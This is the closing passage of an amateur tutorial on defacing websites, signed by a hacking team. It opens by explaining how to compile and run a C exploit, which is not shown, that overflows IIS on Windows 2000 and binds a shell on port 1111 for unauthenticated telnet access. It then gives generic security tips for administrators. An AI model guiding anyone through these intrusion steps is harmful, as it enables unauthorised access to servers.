To implement the C code, you must compile it and run. Now, you must be wondering, what is the use of this code? Actually, the C code causes an overflow in IIS on Windows 2000 and commands the system to bind a shell to the source Ip on port 1111. So, once the exploit works, there will be a shell bind on port 1111 on the target system. To workout, you must telnet the target IP into port 1111, through this you will be connected to the system without any kind of authentication.

Various Security Measures

Website defacement has become a terrible problem for IT (Information Technology) based companies. Everyday thousands of websites are defaced. Well, even Government websites are defaced for different reasons; the most common reason is cyber war. Like in reality, there are wars between two rival countries, similarly, in wired world, there are cyber wars. If you want to see the web attack archive, visit the following site: http://defaced.alldas.org Now, some security measures for the system administrators. - First of all, you must coordinate and organize your web root, with suitable directories. What I mean to say is that, you must organize your files, like images in an image directory, one for server side contents and so on so forth. If you dont configure your web root properly then your web server will be prone to many attacks. - You must be aware of the latest vulnerabilities, visit these sites: http://www.securityfocus.com http://www.packetstorm.org http://www.guininski.com http://www.insecure.org http://www.securiteam.com http://www.slashdot.org http://www.technotronic.com Well, every web server is vulnerable, but you must not fear, you must download the latest patches for the particular vulnerability.

Well, the last thing is that you must be able to predict the moves of a malicious cracker or a script kiddie. You need to know how a

cracker breaks into your site or web server, you need to know the motive behind the attack and you must think, act and work like a hacker and take the cracker out from the root. So, this completes my tutorial on Defacing websites. I hope, you have understood the involutions of web servers. Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM